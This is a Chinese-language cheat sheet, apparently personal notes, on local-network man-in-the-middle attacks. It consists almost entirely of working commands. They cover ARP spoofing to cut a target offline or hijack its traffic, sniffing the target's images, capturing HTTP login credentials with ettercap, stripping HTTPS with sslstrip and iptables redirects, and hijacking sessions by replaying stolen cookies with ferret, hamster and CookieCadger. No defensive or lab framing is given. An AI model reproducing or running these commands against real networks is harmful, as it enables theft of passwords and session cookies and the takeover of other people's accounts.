1.查看局域网中的主机
fping –asg 192.168.1.0/24
2.断网
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
(arpspoof -i 网卡 -t 目标IP 网关)
3.流量劫持
echo 1 >/proc/sys/net/ipv4/ip_forward
(echo空格1空格>)
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
4.图片嗅探
(1)方法1(实验不成功)
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
driftnet -i wlan0
(原因分析:可能丢包原因吧)
(2)方法2(成功)
sudo ettercap -i wlan0 -T -M arp:remote /192.168.1.253//192.168.1.100/
driftnet -i wlan0
(图片文件夹:/tmp/driftnet)
(
Ubuntu下可以安装工具:
sudo apt-get install ettercap-text-only
sudo apt-get install driftnet
)
5.http登录账号密码嗅探
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
ettercap -Tq -i wlan0
(信息太庞杂,可以使用 ettercap -Tq -i wlan0 >test方便查找)
6.https登录账号密码嗅探
vim /etc/ettercap.conf
将
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
修改为
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
sslstrip -a -f -k
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
ettercap -Tq -i wlan0
7.会话劫持
(1)方法1
arpspoof
wireshark -->抓包
ferret --。重新生成抓包后的文件
hamster -- > 重放流量
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
$wireshark
wireshark 保存为.pcap文件
$ferret -r cookie.pcap
将生成的txt文件放到用户目录下
$hamster
配置代理
访问127.0.0.1:1234(上一步的代理)
(2)方法2
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
$ferret -i wlan0
$hamster
(3)方法3
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
CookieCadger-1.08.jar